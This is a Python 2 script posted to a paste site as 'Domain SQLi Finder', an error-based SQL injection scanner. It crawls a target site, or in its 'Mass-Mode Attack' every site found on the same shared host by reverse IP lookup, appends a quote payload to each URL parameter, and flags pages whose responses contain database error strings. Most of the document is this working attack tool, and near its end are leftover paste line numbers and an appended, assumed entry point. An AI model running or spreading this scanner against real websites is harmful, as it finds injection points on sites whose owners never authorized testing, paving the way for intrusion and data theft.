0xspade

Domain SQLi Finder

Aug 25th, 2016
#!/usr/local/bin/python2.7

# This was written for a Penetration Test assessment and is for educational purposes only. Use it at your own risk.
# The author will not be responsible for any damage!
# Intended for authorized Web Application Pen Testing only!

import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime
import DomainReverseIPLookUp
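# DomainReverseIPLookUp is a companion module expected alongside this script; it is
# used below as DomainReverseIPLookUp.generate_reverse_lookup(domain, outputFile, verbose)
# to write the list of sites sharing the target's IP into the reverse look-up file.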

# The following variables get their values from command line args - either the user-supplied value or the defaults below
pagesToCrawl = ""                                   # Number of pages to crawl in a website
maxVulInjectableParam = ""                          # Maximum number of vulnerable pages (parameters) to find
output = ""                                         # Output file name - append mode (a)
reverseLookUp = "DSQLiReverseLookUp.txt"            # Output file name for reverseIP lookup - write+ mode (w+)
crawlDump = 'DSQLiCrawlerOutput.txt'                # Stores crawling result for current crawl only - append mode (a)
uniqueLinksDump = 'DSQLiUniqueLinks.txt'            # Stores unique links for current scan only - append mode (a)
errorDump = 'DSQLiErrorDump.txt'                    # Dumps handled errors - append mode (a)
sitesToScan = ""                                    # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack
maxVulSites = ""                                    # Stores maximum number of vulnerable sites to find with Mass-Mode Attack

reverseFlag = 0                                     # Determines whether reverseLookUp file is generated by script or user supplies it
maxVulSitesFlag = 0                                 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack
verbose = 0                                         # Determines what messages to display on screen (0 or 1)

sqlPayload = ["1'"]                                 # SQL payloads, add more here
sqlErrors = [
    "Warning",
    "mysql_fetch_array()",
    "mysql_fetch_object()",
    "mysql_num_rows()",
    "mysql_free_result()",
    "mysql_real_escape_string()",
    "mysql_connect()",
    "mysql_select_db()",
    "mysql_query()",
    "You have an error in your SQL syntax",
    "Unclosed quotation mark after the character string",
    "Server Error in '/' Application",
    "Microsoft OLE DB Provider for ODBC Drivers error",
    "supplied argument is not a valid OCI8-Statement",
    "microsoft jet database engine"
    ]                                               # add more here
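# Illustrative example (hypothetical URL): a crawled link such as
#   http://example.com/item.php?id=1&cat=2
# is reduced to one URL per parameter ("http://example.com/item.php?id=" and
# "http://example.com/item.php?id=1&cat="), the payload is appended to each
# (e.g. "http://example.com/item.php?id=1'"), and the response body is searched
# for the error strings above, e.g. "You have an error in your SQL syntax".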

# Determine platform and clear screen
def clear_screen():
    if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
        os.system('clear')
    elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
        os.system('cls')
    else:
        pass


# Banner - TODO: the formatting still needs cleanup
def banner():
    print """
    ##################################################################

        Domain SQLi Finder - (Error Based Tool-v0.1)
               b0nd@garage4hackers.com

                Greetz to:
            (www.garage4hackers.com)
     GGGGGG\
    GG  __GG\
    GG /  \__| aaaaaa\  rrrrrr\ aaaaaa\  gggggg\  eeeeee\
    GG |GGGG\ \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\
    GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
    GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
    \GGGGGG  |\\aaaaaaa |rr |     \\aaaaaaa |\ggggggg |\\eeeeeee\
     \______/  \_______|\__|      \_______| \____gg | \_______|
                                               gg\  gg |
                                            gggggg  |
                                            \______/
            Usage: python Domain-SQLi-Finder.py -h
    ###################################################################

   """
    print "\tUsage: python %s [options]" % sys.argv[0]
    print "\t\t-h help\n"
    call_exit()

def call_exit():
    print "\n\tExiting ...........\n"
    sys.exit(0)

# Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source
def check_SQLi(uniqueUrls):
    sqliUrls = []                                           # This list will contain prepared URLs (one parameter each) ready to be appended with sqlPayloads
    flag = 0                                                # Variable to check whether the desired 'n' number of vulnerable pages have been found

    for link in uniqueUrls:                                 # This list has all unique URLs, but since a single unique URL might have multiple parameters,
        num = link.count("=")                               # this loop prepares URLs with one parameter each
        if num > 0:
            for x in xrange(num):
                x = x + 1
                url = link.rsplit("=",x)[0]+"="
                sqliUrls.append(url)

    sqliUrls = list(set(sqliUrls))                          # By now this list has all injectable parameters ready to append sqlPayload
    parsed = urlparse.urlparse(link)                        # Later used to obtain website name
    now = datetime.datetime.now()                           # Current time of scanning to put in DSQLiResults output file

    try:
        fd_output = open(output, 'a')
        fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n")          # Writing URL base name to output file
    except IOError:
        print "\n\t[!] Error - could not open|write file %s \n" % output

    if verbose == 1:
        print "\n[*] Testing SQLi on following URLs:"
        for link in sqliUrls:
            print "\t[-] URL: ", link
    else:
        print "\n[*] Testing SQLi on URL's ....."

    # In the following loop, the counter 'flag' is used to find 'n' vulnerable pages. If only a limited number of pages
    # has to be found, the value of flag determines whether the script has found that many pages yet. Once it matches,
    # it breaks out of all loops. Otherwise, if the limit has not been reached but sqliUrls is exhausted, control also
    # leaves the loops. If all pages have to be found (0), flag plays no role other than incrementing itself.

    for link in sqliUrls:
        for pload in sqlPayload:
            if verbose == 1:
                print "\n\n\tTesting: %s\n" % (link+pload)

            try:
                source = urllib2.urlopen(link+pload).read()                                     # Appending sqlPayload and reading source for errors
            except urllib2.HTTPError, err:
                if err.code == 500:
                    if verbose == 1:
                        print "\t\t[!] Error - HTTP Error 500: Internal Server Error"
                        print "\t\t[-] Continuing with next link"
                    continue
                else:
                    if verbose == 1:
                        print "\t\t[!] Error - HTTP Error %d" % err.code
                        print "\t\t[-] Continuing with next link"
                    continue
            for errors in sqlErrors:
                if re.search(errors, source) != None:                                           # If any sql error found in source
                    fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n")
                    print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors)

                    if maxVulInjectableParam != 0:                                              # i.e. if 'n' number of vulnerable parameters have to be found
                        if flag < maxVulInjectableParam:
                            flag = flag + 1
                        else:
                            break
                    else:                                                                       # i.e. if all vulnerable pages have to be found
                        flag = flag + 1
                    break
                else:
                    if verbose == 1:
                        print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors
                    else:
                        pass
            if maxVulInjectableParam != 0 and flag == maxVulInjectableParam:                    # i.e. if 'n' pages have already been found
                break

        if maxVulInjectableParam != 0 and flag == maxVulInjectableParam:                        # i.e. if 'n' pages have already been found
            break

    if flag != 0:
        print "\n\t[-] Target is vulnerable to SQLi, check log file"
        print "\t\t[-] %d injectable vulnerable parameters found" % (flag)

        global maxVulSitesFlag
        maxVulSitesFlag = maxVulSitesFlag + 1               # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack

    else:
        print "\n\t[-] Target is not vulnerable to SQLi"
        try:
            fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n")
            fd_output.close()                                                   # Close the file on completion of each URL, so the log file can be checked
        except IOError:                                                         # for results instantly instead of waiting for the whole script to finish
            print "\n\t[!] Error - file I/O error\n"

    try:
        fd_output.close()
    except IOError:
        pass


# Just finds the unique URLs from all crawled URLs and saves them to a list.
# Concept: parse each URL, find its injectable parameter(s), and check the combination of [netloc, path and injectable parameters] against the
# combinations found so far; if it is unique, update the uniqueUrls list, otherwise move on to the next URL and parse it the same way
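# Example (hypothetical URLs):
#   http://example.com/item.php?id=1&cat=2
#   http://example.com/item.php?id=7&cat=9
# Both reduce to ['example.com', '/item.php', ['id', 'cat']], so only the first
# link is kept - the second is just the same parameters with different values.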
def unique_urls(unsortedUrls):
    print "\n[*] Finding unique URL's ....."

    list_db = []                                                                # Used as temporary storage to compare parameters with already found ones
    uniqueUrls = []                                                             # This one will finally have unique URLs in it

    for link in unsortedUrls:
        list_tmp = []                                                           # Temporary list to store query parameters only
        try:
            parsed = urlparse.urlparse(link)
            num = parsed.query.count("=")                                       # Just checking the parsed.query portion for the number of injectable parameters it has
            x = 0

            for x in xrange(num):
                list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0])    # list_tmp will hold all injectable parameters as elements
                x = x + 1
        except IndexError:
            # In my case, links raise this error because they include an external URL, which increases the number of "=" in the link;
            # the loop then runs one extra time and raises an index-out-of-range error

            if verbose == 1:
                print "\n\t[!] Error - list index out of range - check %s and report to author" % (errorDump)

            try:
                fd_errorDump = open(errorDump, 'a')
                fd_errorDump.write("\n\t[*] Error occurred inside unique_urls function for:\t" + parsed.query)
            except IOError:
                print "\n\t[!] Error - could not open|write file %s \n" % errorDump
            continue

        list_tmp = [parsed.netloc, parsed.path, list_tmp]

        if list_tmp in list_db:                                                 # For the first URL this check always fails, as list_db is empty; a hit means
            continue                                                            # the same parameters (with different values) were already found, so continue
        else:
            list_db.append(list_tmp)                                            # Update the found unique parameters
            uniqueUrls.append(link)                                             # Update the list with unique complete URLs

    if verbose == 1:
        for link in uniqueUrls:
            print "\t[-] Unique link found: ", link

    try:
        fd_uniqueLinkDump = open(uniqueLinksDump, 'a')
        for link in uniqueUrls:
            fd_uniqueLinkDump.write(link + '\n')
        fd_uniqueLinkDump.close()
    except IOError:
        print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump

    check_SQLi(uniqueUrls)                                                      # Call SQLi check function to test SQLi vulnerability


# Function crawls the URL to find "pagesToCrawl" number of pages.
# It stops when the limit is reached or no more pages are left to crawl, whichever happens first
def crawl_site(url):
    print "[*] Attacking URL -> ", url
    print "\t[*] Crawling %s to find injectable parameters" % url

    spider = chilkat.CkSpider()                                                 # Using Chilkat Library. Some modules are free.
    spider.Initialize(url)
    spider.AddUnspidered(url)
    spider.CrawlNext()

    print "\n\t[-] Website Title: ", spider.lastHtmlTitle()
    print "\n\t[-] Crawling Pages",                                             # The trailing comma shows a progress bar in the non-verbose case

    crawlerOutput = []                                                          # This list will hold up to pagesToCrawl pages of the URL

    for i in range(0,int(pagesToCrawl)):
        success = spider.CrawlNext()
        if (success == True):
            if verbose == 1:
                if i%50 == 0:
                    print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl)
                print "\t", spider.lastUrl()
            else:
                sys.stdout.flush()
                print ".",                                                      # In the non-verbose case, it prints dots to show the progress
            crawlerOutput.append(spider.lastUrl())

        else:
            if (spider.get_NumUnspidered() == 0):
                print "\n\t[-] No more URLs to spider"
                i = i - 1                                                       # Need to decrement, else it gives a +1 count for total pages crawled
                break
            else:
                print spider.lastErrorText()
                continue

        spider.SleepMs(10)

    try:
        fd_crawlDump = open(crawlDump, 'a')                                     # Logs
        for link in crawlerOutput:
            fd_crawlDump.write(link + '\n')
        fd_crawlDump.close()
    except IOError:
        print "\n\t[!] Error - could not open|write file %s \n" % crawlDump

    print "\n\t[-] Crawled %d pages successfully" % (i+1)

    if verbose == 1:
        print "\n[*] Parsing URL's to collect links with '=' in them ....."

    urlsWithParameters = []                                                 # This list will have only those URLs which have '=' in them i.e. injectable parameter(s)
    for link in crawlerOutput:
        if link.count("=") > 0:
            urlsWithParameters.append(link)

    if urlsWithParameters != []:
        if verbose == 1:
            print "\t[-] Done"
        unique_urls(urlsWithParameters)                                     # Time to find unique URLs among all with '=' in them
    else:
        print "\n\t[!] No injectable parameter found"
        now = datetime.datetime.now()                                       # Current time to put in DSQLiResults output file
        try:
            parsed = urlparse.urlparse(url)
            fd_output = open(output, 'a')
            fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n")          # Writing URL base name to output file
            fd_output.write("\t\tNo injectable parameter found\n")
            fd_output.close()
        except IOError:
            print "\n\t[!] Error - could not open|write file %s \n" % output

# Function tries to find SQLi on sites on shared hosting
def attack_Domain(durl):
    sites = []
    counter = 0                                                             # Keeps count of how many sites have been scanned so far
    deadLinks = 0                                                           # Keeps count of how many dead links have been found
    print "\n[*] Attacking Domain -> ", durl

    if reverseFlag == 0:                                                    # i.e. if the --reverse switch is not used on the console: do the reverseIP lookup and generate the result
        DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose)     # pass domain url, output file name and verbose level
        try:
            fd_reverseLookUp = open(reverseLookUp, 'r')
            for url in fd_reverseLookUp.readlines():
                sites.append(url)                                           # List sites contains all the domains hosted on the server

        except IOError:
            print "\n\t[!] Error - %s file missing" % reverseLookUp
            print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
            call_exit()

    elif reverseFlag == 1:                                                  # i.e. if the --reverse switch is mentioned: skip the reverse IP lookup and read data from the already generated file
        try:
            fd_reverseLookUp = open(reverseLookUp, 'r')
            for url in fd_reverseLookUp.readlines():
                sites.append(url)                                           # List sites contains all the domains hosted on the server

        except IOError:
            print "\n\t[!] Error - %s file missing" % reverseLookUp
            print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
            call_exit()

    if sitesToScan != 0:                                                    # Honour --sites: limit how many sites to scan (0 means scan all)
        sites = sites[0:sitesToScan]

    for site in sites:
        try:
            print "\n\t#################################################"
            print "\n\t [-] Number of alive sites scanned so far: ", counter
            print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag
            print "\n\t [-] Number of dead sites found so far: ", deadLinks
            print "\n\t#################################################\n"
            if maxVulSites != 0:                                            # i.e. if not all vulnerable sites are to be found
                if maxVulSitesFlag == maxVulSites:
                    print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found"
                    break

            site = site.strip()                                             # remove the trailing \n left by readlines()
            if site[:7] != "http://":                                       # prepend http:// to url, if not already done by user
                site = "http://" + site                                     # what about https sites?

            print "-"*80
            print "\n[*] Target URL - %s ....." % (site)                    # Verify URL for its existence
            if verify_URL(site) == True:                                    # Function call to verify URL for existence
                print "\t[-] URL Verified\n"
                crawl_site(site)                                            # Pass the site to crawl function
            else:
                print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site
                deadLinks = deadLinks + 1
                continue
        except KeyboardInterrupt:
            decision = raw_input("\n\t[?] How do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ")
            if decision == 'C' or decision == 'c':
                continue
            elif decision == 'q':
                print "\n[!] Error - user aborted"
                call_exit()
            else:
                print "\n\tEnjoy: oo=========> (|)"
                call_exit()

        counter = counter + 1                                               # Counting only those sites which really got scanned;
                                                                            # for those whose URLs couldn't be verified, the counter is not incremented

    print "\n\n[*] Scanning Finished"
    print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag
    print "\t[-] Check log file %s for result" % output

# Function to verify URL is alive and accessible
def verify_URL(url):
    good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY]     # 200, 302, 301 respectively
    host, path = urlparse.urlparse(url)[1:3]                                # elems [1] and [2] - netloc and path

    try:
        conn = httplib.HTTPConnection(host)
        conn.request('HEAD', path)
        status = conn.getresponse().status
        conn.close()
    except StandardError:
        status = None

    return status in good_codes                                             # Either 'True' or 'False'


# Parse command line arguments, allowed combinations and mandatory values
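# Example invocations (illustrative targets and values):
#   python Domain-SQLi-Finder.py --url example.com --crawl 200 --pages 2 --verbose 1
#   python Domain-SQLi-Finder.py --durl example.com --sites 10 --vulsites 2 --dcrawl 300 --dpages 1
#   python Domain-SQLi-Finder.py --durl example.com --reverse reverse.txt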
def parseArgs():
    parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to b0nd@garage4hackers.com | www.garage4hackers.com")
    parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int)
    parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)')

    group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain')
    group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi')
    group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int)
    group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int)

    # Mind it - group1 and group2 share the same dests "crawl" and "pages". So whether --crawl or --dcrawl is used on the console,
    # they update the same variable "crawl" and ultimately the global variable pagesToCrawl. The same goes for "pages"

    group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain')
    group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi')

    group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)')
    group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)')
    group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)')
    group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)')
    group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file')

    args = parser.parse_args()

    # Check exclusiveness of options
    if (args.URL != None and args.DURL != None):
        print "\n\t[!] Error - Mutually exclusive options (--url, --durl)"
        call_exit()

    # Check existence of at least one option
    if (args.URL == None and args.DURL == None):
        print "\n\t[!] Error - No mode selected (--url, --durl)"
        call_exit()

    # Check that a value is passed to each argument, e.g. --crawl without a value would pass "None" and the program would crash.
    # All of these switches have a default value, so the user either leaves them off the command line or must supply a value for them
    if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None):
        print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)"
        call_exit()

    # Check to make sure the value of vulsites is less than sites (0 means 'all', so it is not compared) and pages < crawl
    if args.sites != 0 and args.sites < args.vulsites:
        print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
        call_exit()
    elif args.crawl < args.pages:
        print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
        call_exit()

    # Check that the --reverse switch is used with --durl only
    if ((args.URL != None) and (args.reverseLookUp != None)):
        print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only"
        call_exit()

    global reverseLookUp                                                        # Declaring it here as it's used a couple of times in this function

    # Check verbosity (--verbose argument)
    if args.verbose != None:                                                    # It would be None only when mentioned without any value i.e. --verbose <no value>
        if args.verbose == 1:                                                   # and if that is the case, the global value of verbose is 0 already, so - verbose off
            print "\n[*] Verbose Mode On"
            global verbose                                                      # verbose global variable
            verbose = 1

            if args.URL != None:                                                # Verbose mode for --url
                print "\t[-] Pages to crawl (default=500): ", (args.crawl)
                print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages)
                print "\t[-] Output file name: %s" % (args.siteOutput)

            if args.DURL != None:                                               # Verbose mode for --durl
                print "\t[-] Number of sites to scan on domain (default=0 i.e all): ", (args.sites)
                print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites)
                print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl)
                print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages)
                if args.reverseLookUp != None:                                  # i.e. if the reverse look-up file name is mentioned on the console
                    print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0])
                else:
                    print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp

                print "\t[-] Final result output file: %s" % (args.siteOutput)

        else:                                                                   # i.e. if value 0 is passed to --verbose
            print "\n[*] Verbose Mode Off"
    else:                                                                       # i.e. verbose has None value, it's been passed without a value
        print "\n[*] Verbose Mode Off (by default)"

    # By this point, either the --url or the --durl switch is enabled.
    # The following assignments are for both --url and --durl - see if you wish to keep only the relevant one here and move the rest into "if args.DURL != None".
    # It's OK with the current "common" crawl and pages parameters. If I assign parameters separately for --url and --durl then first I
    # would need to define "dcrawl" and "dpages" and use them in combination with --durl
    global pagesToCrawl
    pagesToCrawl = args.crawl
    global maxVulInjectableParam
    maxVulInjectableParam = args.pages
    global output
    output = args.siteOutput
    global sitesToScan
    sitesToScan = args.sites
    global maxVulSites
    maxVulSites = args.vulsites

    # Single-Mode Attack (--url argument)
    if args.URL != None:
        if args.URL[0][:7] != "http://":                                    # prepend http:// to url, if not already done by user
            args.URL[0] = "http://"+args.URL[0]                             # what about https sites?

        print "\n[*] Verifying URL....."                                    # Verify URL for its existence
        if verify_URL(args.URL[0]) == True:                                 # Function call to verify URL for existence
            print "\t[-] URL Verified\n"
            crawl_site(args.URL[0])                                         # Goto the function which deals with 1 URL
        else:
            print "\n\t[-] URL could not be verified."
            call_exit()

    # Mass-Mode Attack (--durl argument)
    elif args.DURL != None:
        if args.DURL[0][:7] != "http://":
            args.DURL[0] = "http://"+args.DURL[0]

        # reverseLookUp has no default value, so if not mentioned on the console it will be None. If not None, the user wants to read an already
        # generated reverse look-up file, either created by this code or copied from somewhere. In that case, the input file must reside in the same directory
        if args.reverseLookUp != None:
            reverseLookUp = args.reverseLookUp[0]

            global reverseFlag                                              # Determines whether reverseLookUp file is generated by script or user supplies it
            reverseFlag = 1
            attack_Domain(args.DURL[0])

        else:                                                               # i.e. --reverse is not mentioned on the command prompt. Our code shall generate one.
            print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
            if verify_URL(args.DURL[0]) == True:
                print "\t[-] Domain Verified\n"
                attack_Domain(args.DURL[0])
            else:
                print "\n\t[-] Domain could not be verified."
                call_exit()


  546.  
  547. def main():
  548.     #clear_screen()
  549.     if len(sys.argv) < 2:
  550.         banner()
  551.    
  552.     parseArgs()                                                             # Parse command line arguments
  553.     call_exit()
  554.    
  555.  
  556. # ---------------------------------------- Code execution starts here ------------------------
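# Assumed entry point (the paste ends at the comment above; presumably main() is called as below)
if __name__ == '__main__':
    main()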